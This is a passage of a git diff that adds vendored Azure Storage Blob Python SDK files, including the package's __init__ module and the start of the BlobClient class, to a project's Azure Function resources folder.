------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +import os + +from typing import Union, Iterable, AnyStr, IO, Any, Dict # pylint: disable=unused-import +from ._version import VERSION +from ._blob_client import BlobClient +from ._container_client import ContainerClient +from ._blob_service_client import BlobServiceClient +from ._lease import BlobLeaseClient +from ._download import StorageStreamDownloader +from ._quick_query_helper import BlobQueryReader +from ._shared_access_signature import generate_account_sas, generate_container_sas, generate_blob_sas +from ._shared.policies import ExponentialRetry, LinearRetry +from ._shared.response_handlers import PartialBatchErrorException +from ._shared.models import( + LocationMode, + ResourceTypes, + AccountSasPermissions, + StorageErrorCode, + UserDelegationKey +) +from ._generated.models import ( + RehydratePriority, +) +from ._models import ( + BlobType, + BlockState, + StandardBlobTier, + PremiumPageBlobTier, + BlobImmutabilityPolicyMode, + SequenceNumberAction, + PublicAccess, + BlobAnalyticsLogging, + Metrics, + RetentionPolicy, + StaticWebsite, + CorsRule, + ContainerProperties, + BlobProperties, + FilteredBlob, + LeaseProperties, + ContentSettings, + CopyProperties, + BlobBlock, + PageRange, + AccessPolicy, + ContainerSasPermissions, + BlobSasPermissions, + CustomerProvidedEncryptionKey, + ContainerEncryptionScope, + BlobQueryError, + DelimitedJsonDialect, + DelimitedTextDialect, + QuickQueryDialect, + ArrowDialect, + ArrowType, + ObjectReplicationPolicy, + ObjectReplicationRule, + ImmutabilityPolicy +) +from ._list_blobs_helper import BlobPrefix + +__version__ = VERSION + + +def upload_blob_to_url( + blob_url, # type: str + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + credential=None, # type: Any + **kwargs): + # type: (...) -> Dict[str, Any] + """Upload data to a given URL + + The data will be uploaded as a block blob. + + :param str blob_url: + The full URI to the blob. This can also include a SAS token. + :param data: + The data to upload. This can be bytes, text, an iterable or a file-like object. + :type data: bytes or str or Iterable + :param credential: + The credentials with which to authenticate. This is optional if the + blob URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword bool overwrite: + Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob_to_url will overwrite any existing data. If set to False, the + operation will fail with a ResourceExistsError. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword dict(str,str) metadata: + Name-value pairs associated with the blob as metadata. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https as https (the default) will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used, because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword str encoding: + Encoding to use if text is supplied as input. Defaults to UTF-8. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: dict(str, Any) + """ + with BlobClient.from_blob_url(blob_url, credential=credential) as client: + return client.upload_blob(data=data, blob_type=BlobType.BlockBlob, **kwargs) + + +def _download_to_stream(client, handle, **kwargs): + """Download data to specified open file-handle.""" + stream = client.download_blob(**kwargs) + stream.readinto(handle) + + +def download_blob_from_url( + blob_url, # type: str + output, # type: str + credential=None, # type: Any + **kwargs): + # type: (...) -> None + """Download the contents of a blob to a local file or stream. + + :param str blob_url: + The full URI to the blob. This can also include a SAS token. + :param output: + Where the data should be downloaded to. This could be either a file path to write to, + or an open IO handle to write to. + :type output: str or writable stream. + :param credential: + The credentials with which to authenticate. This is optional if the + blob URL already has a SAS token or the blob is public. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, + an account shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword bool overwrite: + Whether the local file should be overwritten if it already exists. The default value is + `False` - in which case a ValueError will be raised if the file already exists. If set to + `True`, an attempt will be made to write to the existing file. If a stream handle is passed + in, this value is ignored. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :keyword int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https as https (the default) will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used, because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :rtype: None + """ + overwrite = kwargs.pop('overwrite', False) + with BlobClient.from_blob_url(blob_url, credential=credential) as client: + if hasattr(output, 'write'): + _download_to_stream(client, output, **kwargs) + else: + if not overwrite and os.path.isfile(output): + raise ValueError("The file '{}' already exists.".format(output)) + with open(output, 'wb') as file_handle: + _download_to_stream(client, file_handle, **kwargs) + + +__all__ = [ + 'upload_blob_to_url', + 'download_blob_from_url', + 'BlobServiceClient', + 'ContainerClient', + 'BlobClient', + 'BlobType', + 'BlobLeaseClient', + 'StorageErrorCode', + 'UserDelegationKey', + 'ExponentialRetry', + 'LinearRetry', + 'LocationMode', + 'BlockState', + 'StandardBlobTier', + 'PremiumPageBlobTier', + 'SequenceNumberAction', + 'BlobImmutabilityPolicyMode', + 'ImmutabilityPolicy', + 'PublicAccess', + 'BlobAnalyticsLogging', + 'Metrics', + 'RetentionPolicy', + 'StaticWebsite', + 'CorsRule', + 'ContainerProperties', + 'BlobProperties', + 'BlobPrefix', + 'FilteredBlob', + 'LeaseProperties', + 'ContentSettings', + 'CopyProperties', + 'BlobBlock', + 'PageRange', + 'AccessPolicy', + 'QuickQueryDialect', + 'ContainerSasPermissions', + 'BlobSasPermissions', + 'ResourceTypes', + 'AccountSasPermissions', + 'StorageStreamDownloader', + 'CustomerProvidedEncryptionKey', + 'RehydratePriority', + 'generate_account_sas', + 'generate_container_sas', + 'generate_blob_sas', + 'PartialBatchErrorException', + 'ContainerEncryptionScope', + 'BlobQueryError', + 'DelimitedJsonDialect', + 'DelimitedTextDialect', + 'ArrowDialect', + 'ArrowType', + 'BlobQueryReader', + 'ObjectReplicationPolicy', + 'ObjectReplicationRule' +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..90f683a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_client.cpython-39.pyc new file mode 100644 index 0000000..8803da6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_service_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_service_client.cpython-39.pyc new file mode 100644 index 0000000..28571cb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_blob_service_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_container_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_container_client.cpython-39.pyc new file mode 100644 index 0000000..fc22413 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_container_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_deserialize.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_deserialize.cpython-39.pyc new file mode 100644 index 0000000..5f778b8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_deserialize.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_download.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_download.cpython-39.pyc new file mode 100644 index 0000000..1ad1957 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_download.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_lease.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_lease.cpython-39.pyc new file mode 100644 index 0000000..a8e85ed Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_lease.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_list_blobs_helper.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_list_blobs_helper.cpython-39.pyc new file mode 100644 index 0000000..c1526ae Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_list_blobs_helper.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_models.cpython-39.pyc new file mode 100644 index 0000000..2637fff Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_quick_query_helper.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_quick_query_helper.cpython-39.pyc new file mode 100644 index 0000000..0407853 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_quick_query_helper.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_serialize.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_serialize.cpython-39.pyc new file mode 100644 index 0000000..db5d041 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_serialize.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_shared_access_signature.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_shared_access_signature.cpython-39.pyc new file mode 100644 index 0000000..163235b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_shared_access_signature.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_upload_helpers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_upload_helpers.cpython-39.pyc new file mode 100644 index 0000000..8fbae34 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_upload_helpers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_version.cpython-39.pyc new file mode 100644 index 0000000..d4146c4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__pycache__/_version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_client.py new file mode 100644 index 0000000..fa2c07e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_blob_client.py @@ -0,0 +1,4128 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=too-many-lines,no-self-use +from functools import partial +from io import BytesIO +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, IO, Iterable, AnyStr, Dict, List, Tuple, + TYPE_CHECKING, + TypeVar, Type) +import warnings + +try: + from urllib.parse import urlparse, quote, unquote +except ImportError: + from urlparse import urlparse # type: ignore + from urllib2 import quote, unquote # type: ignore +import six +from azure.core.paging import ItemPaged +from azure.core.pipeline import Pipeline +from azure.core.tracing.decorator import distributed_trace +from azure.core.exceptions import ResourceNotFoundError, HttpResponseError, ResourceExistsError + +from ._shared import encode_base64 +from ._shared.base_client import StorageAccountHostsMixin, parse_connection_str, parse_query, TransportWrapper +from ._shared.encryption import generate_blob_encryption_data +from ._shared.uploads import IterStreamer +from ._shared.request_handlers import ( + add_metadata_headers, get_length, read_length, + validate_and_format_range_headers) +from ._shared.response_handlers import return_response_headers, process_storage_error, return_headers_and_deserialized +from ._generated import AzureBlobStorage +from ._generated.models import ( # pylint: disable=unused-import + DeleteSnapshotsOptionType, + BlobHTTPHeaders, + BlockLookupList, + AppendPositionAccessConditions, + SequenceNumberAccessConditions, + QueryRequest, + CpkInfo) +from ._serialize import ( + get_modify_conditions, + get_source_conditions, + get_cpk_scope_info, + get_api_version, + serialize_blob_tags_header, + serialize_blob_tags, + serialize_query_format, get_access_conditions +) +from ._deserialize import get_page_ranges_result, deserialize_blob_properties, deserialize_blob_stream, parse_tags, \ + deserialize_pipeline_response_into_cls +from ._quick_query_helper import BlobQueryReader +from ._upload_helpers import ( + upload_block_blob, + upload_append_blob, + upload_page_blob, _any_conditions) +from ._models import BlobType, BlobBlock, BlobProperties, BlobQueryError, QuickQueryDialect, \ + DelimitedJsonDialect, DelimitedTextDialect, PageRangePaged, PageRange +from ._download import StorageStreamDownloader +from ._lease import BlobLeaseClient + +if TYPE_CHECKING: + from datetime import datetime + from ._generated.models import BlockList + from ._models import ( # pylint: disable=unused-import + ContentSettings, + ImmutabilityPolicy, + PremiumPageBlobTier, + StandardBlobTier, + SequenceNumberAction + ) + +_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION = ( + 'The require_encryption flag is set, but encryption is not supported' + ' for this method.') + +ClassType = TypeVar("ClassType") + + +class BlobClient(StorageAccountHostsMixin): # pylint: disable=too-many-public-methods + """A client to interact with a specific blob, although that blob may not yet exist. + + For more optional configuration, please click + `here `_. + + :param str account_url: + The URI to the storage account. In order to create a client given the full URI to the blob, + use the :func:`from_blob_url` classmethod. + :param container_name: The container name for the blob. + :type container_name: str + :param blob_name: The name of the blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type blob_name: str + :param str snapshot: + The optional blob snapshot on which to operate. This can be the snapshot ID string + or the response returned from :func:`create_snapshot`. + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword str api_version: + The Storage API version to use for requests. Default value is the most recent service version that is + compatible with the current SDK. Setting to an older version may result in reduced feature compatibility. + + .. versionadded:: 12.2.0 + + :keyword str secondary_hostname: + The hostname of the secondary endpoint. + :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks. + Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_put_size: If the blob size is less than or equal max_single_put_size, then the blob will be + uploaded with only one http PUT request. If the blob size is larger than max_single_put_size, + the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB. + :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient + algorithm when uploading a block blob. Defaults to 4*1024*1024+1. + :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False. + :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call, + the exceeded part will be downloaded in chunks (could be parallel). Defaults to 32*1024*1024, or 32MB. + :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024, + or 4MB. + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START create_blob_client] + :end-before: [END create_blob_client] + :language: python + :dedent: 8 + :caption: Creating the BlobClient from a URL to a public blob (no auth needed). + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START create_blob_client_sas_url] + :end-before: [END create_blob_client_sas_url] + :language: python + :dedent: 8 + :caption: Creating the BlobClient from a SAS URL to a blob. + """ + def __init__( + self, account_url, # type: str + container_name, # type: str + blob_name, # type: str + snapshot=None, # type: Optional[Union[str, Dict[str, Any]]] + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + try: + if not account_url.lower().startswith('http'): + account_url = "https://" + account_url + except AttributeError: + raise ValueError("Account URL must be a string.") + parsed_url = urlparse(account_url.rstrip('/')) + + if not (container_name and blob_name): + raise ValueError("Please specify a container name and blob name.") + if not parsed_url.netloc: + raise ValueError("Invalid URL: {}".format(account_url)) + + path_snapshot, sas_token = parse_query(parsed_url.query) + + self.container_name = container_name + self.blob_name = blob_name + try: + self.snapshot = snapshot.snapshot # type: ignore + except AttributeError: + try: + self.snapshot = snapshot['snapshot'] # type: ignore + except TypeError: + self.snapshot = snapshot or path_snapshot + + # This parameter is used for the hierarchy traversal. Give precedence to credential. + self._raw_credential = credential if credential else sas_token + self._query_str, credential = self._format_query_string(sas_token, credential, snapshot=self.snapshot) + super(BlobClient, self).__init__(parsed_url, service='blob', credential=credential, **kwargs) + self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline) + self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access + + def _format_url(self, hostname): + container_name = self.container_name + if isinstance(container_name, six.text_type): + container_name = container_name.encode('UTF-8') + return "{}://{}/{}/{}{}".format( + self.scheme, + hostname, + quote(container_name), + quote(self.blob_name, safe='~/'), + self._query_str) + + def _encode_source_url(self, source_url): + parsed_source_url = urlparse(source_url) + source_scheme = parsed_source_url.scheme + source_hostname = parsed_source_url.netloc.rstrip('/') + source_path = unquote(parsed_source_url.path) + source_query = parsed_source_url.query + result = ["{}://{}{}".format(source_scheme, source_hostname, quote(source_path, safe='~/'))] + if source_query: + result.append(source_query) + return '?'.join(result) + + @classmethod + def from_blob_url(cls, blob_url, credential=None, snapshot=None, **kwargs): + # type: (Type[ClassType], str, Optional[Any], Optional[Union[str, Dict[str, Any]]], Any) -> ClassType + """Create BlobClient from a blob url. This doesn't support customized blob url with '/' in blob name. + + :param str blob_url: + The full endpoint URL to the Blob, including SAS token and snapshot if used. This could be + either the primary endpoint, or the secondary endpoint depending on the current `location_mode`. + :type blob_url: str + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token, or the connection string already has shared + access key values. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account shared access + key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :param str snapshot: + The optional blob snapshot on which to operate. This can be the snapshot ID string + or the response returned from :func:`create_snapshot`. If specified, this will override + the snapshot in the url. + :returns: A Blob client. + :rtype: ~azure.storage.blob.BlobClient + """ + try: + if not blob_url.lower().startswith('http'): + blob_url = "https://" + blob_url + except AttributeError: + raise ValueError("Blob URL must be a string.") + parsed_url = urlparse(blob_url.rstrip('/')) + + if not parsed_url.netloc: + raise ValueError("Invalid URL: {}".format(blob_url)) + + account_path = "" + if ".core." in parsed_url.netloc: + # .core. is indicating non-customized url. Blob name with directory info can also be parsed. + path_blob = parsed_url.path.lstrip('/').split('/', maxsplit=1) + elif "localhost" in parsed_url.netloc or "127.0.0.1" in parsed_url.netloc: + path_blob = parsed_url.path.lstrip('/').split('/', maxsplit=2) + account_path += '/' + path_blob[0] + else: + # for customized url. blob name that has directory info cannot be parsed. + path_blob = parsed_url.path.lstrip('/').split('/') + if len(path_blob) > 2: + account_path = "/" + "/".join(path_blob[:-2]) + + account_url = "{}://{}{}?{}".format( + parsed_url.scheme, + parsed_url.netloc.rstrip('/'), + account_path, + parsed_url.query) + + msg_invalid_url = "Invalid URL. Provide a blob_url with a valid blob and container name." + if len(path_blob) <= 1: + raise ValueError(msg_invalid_url) + container_name, blob_name = unquote(path_blob[-2]), unquote(path_blob[-1]) + if not container_name or not blob_name: + raise ValueError(msg_invalid_url) + + path_snapshot, _ = parse_query(parsed_url.query) + if snapshot: + try: + path_snapshot = snapshot.snapshot # type: ignore + except AttributeError: + try: + path_snapshot = snapshot['snapshot'] # type: ignore + except TypeError: + path_snapshot = snapshot + + return cls( + account_url, container_name=container_name, blob_name=blob_name, + snapshot=path_snapshot, credential=credential, **kwargs + ) + + @classmethod + def from_connection_string( + cls, # type: Type[ClassType] + conn_str, # type: str + container_name, # type: str + blob_name, # type: str + snapshot=None, # type: Optional[str] + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): # type: (...) -> ClassType + """Create BlobClient from a Connection String. + + :param str conn_str: + A connection string to an Azure Storage account. + :param container_name: The container name for the blob. + :type container_name: str + :param blob_name: The name of the blob with which to interact. + :type blob_name: str + :param str snapshot: + The optional blob snapshot on which to operate. This can be the snapshot ID string + or the response returned from :func:`create_snapshot`. + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token, or the connection string already has shared + access key values. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account shared access + key, or an instance of a TokenCredentials class from azure.identity. + Credentials provided here will take precedence over those in the connection string. + :returns: A Blob client. + :rtype: ~azure.storage.blob.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START auth_from_connection_string_blob] + :end-before: [END auth_from_connection_string_blob] + :language: python + :dedent: 8 + :caption: Creating the BlobClient from a connection string. + """ + account_url, secondary, credential = parse_connection_str(conn_str, credential, 'blob') + if 'secondary_hostname' not in kwargs: + kwargs['secondary_hostname'] = secondary + return cls( + account_url, container_name=container_name, blob_name=blob_name, + snapshot=snapshot, credential=credential, **kwargs + ) + + @distributed_trace + def get_account_information(self, **kwargs): + # type: (**Any) -> Dict[str, str] + """Gets information related to the storage account in which the blob resides. + + The information can also be retrieved if the user has a SAS to a container or blob. + The keys in the returned dictionary include 'sku_name' and 'account_kind'. + + :returns: A dict of account information (SKU and account type). + :rtype: dict(str, str) + """ + try: + return self._client.blob.get_account_info(cls=return_response_headers, **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _upload_blob_options( # pylint:disable=too-many-statements + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + blob_type=BlobType.BlockBlob, # type: Union[str, BlobType] + length=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Dict[str, Any] + if self.require_encryption and not self.key_encryption_key: + raise ValueError("Encryption required but no key was provided.") + encryption_options = { + 'required': self.require_encryption, + 'key': self.key_encryption_key, + 'resolver': self.key_resolver_function, + } + if self.key_encryption_key is not None: + cek, iv, encryption_data = generate_blob_encryption_data(self.key_encryption_key) + encryption_options['cek'] = cek + encryption_options['vector'] = iv + encryption_options['data'] = encryption_data + + encoding = kwargs.pop('encoding', 'UTF-8') + if isinstance(data, six.text_type): + data = data.encode(encoding) # type: ignore + if length is None: + length = get_length(data) + if isinstance(data, bytes): + data = data[:length] + + if isinstance(data, bytes): + stream = BytesIO(data) + elif hasattr(data, 'read'): + stream = data + elif hasattr(data, '__iter__'): + stream = IterStreamer(data, encoding=encoding) + else: + raise TypeError("Unsupported data type: {}".format(type(data))) + + validate_content = kwargs.pop('validate_content', False) + content_settings = kwargs.pop('content_settings', None) + overwrite = kwargs.pop('overwrite', False) + max_concurrency = kwargs.pop('max_concurrency', 1) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + kwargs['cpk_info'] = cpk_info + + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + kwargs['lease_access_conditions'] = get_access_conditions(kwargs.pop('lease', None)) + kwargs['modified_access_conditions'] = get_modify_conditions(kwargs) + kwargs['cpk_scope_info'] = get_cpk_scope_info(kwargs) + if content_settings: + kwargs['blob_headers'] = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=content_settings.content_md5, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + kwargs['blob_tags_string'] = serialize_blob_tags_header(kwargs.pop('tags', None)) + kwargs['stream'] = stream + kwargs['length'] = length + kwargs['overwrite'] = overwrite + kwargs['headers'] = headers + kwargs['validate_content'] = validate_content + kwargs['blob_settings'] = self._config + kwargs['max_concurrency'] = max_concurrency + kwargs['encryption_options'] = encryption_options + + if blob_type == BlobType.BlockBlob: + kwargs['client'] = self._client.block_blob + kwargs['data'] = data + elif blob_type == BlobType.PageBlob: + kwargs['client'] = self._client.page_blob + elif blob_type == BlobType.AppendBlob: + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + kwargs['client'] = self._client.append_blob + else: + raise ValueError("Unsupported BlobType: {}".format(blob_type)) + return kwargs + + def _upload_blob_from_url_options(self, source_url, **kwargs): + # type: (...) -> Dict[str, Any] + tier = kwargs.pop('standard_blob_tier', None) + overwrite = kwargs.pop('overwrite', False) + content_settings = kwargs.pop('content_settings', None) + source_authorization = kwargs.pop('source_authorization', None) + if content_settings: + kwargs['blob_http_headers'] = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=None, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'copy_source_authorization': source_authorization, + 'content_length': 0, + 'copy_source_blob_properties': kwargs.pop('include_source_blob_properties', True), + 'source_content_md5': kwargs.pop('source_content_md5', None), + 'copy_source': source_url, + 'modified_access_conditions': get_modify_conditions(kwargs), + 'blob_tags_string': serialize_blob_tags_header(kwargs.pop('tags', None)), + 'cls': return_response_headers, + 'lease_access_conditions': get_access_conditions(kwargs.pop('destination_lease', None)), + 'tier': tier.value if tier else None, + 'source_modified_access_conditions': get_source_conditions(kwargs), + 'cpk_info': cpk_info, + 'cpk_scope_info': get_cpk_scope_info(kwargs) + } + options.update(kwargs) + if not overwrite and not _any_conditions(**options): # pylint: disable=protected-access + options['modified_access_conditions'].if_none_match = '*' + return options + + @distributed_trace + def upload_blob_from_url(self, source_url, **kwargs): + # type: (str, Any) -> Dict[str, Any] + """ + Creates a new Block Blob where the content of the blob is read from a given URL. + The content of an existing blob is overwritten with the new blob. + + :param str source_url: + A URL of up to 2 KB in length that specifies a file or blob. + The value should be URL-encoded as it would appear in a request URI. + If the source is in another account, the source must either be public + or must be authenticated via a shared access signature. If the source + is public, no authentication is required. + Examples: + https://myaccount.blob.core.windows.net/mycontainer/myblob + + https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot= + + https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken + :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob will overwrite the existing data. If set to False, the + operation will fail with ResourceExistsError. + :keyword bool include_source_blob_properties: + Indicates if properties from the source blob should be copied. Defaults to True. + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), 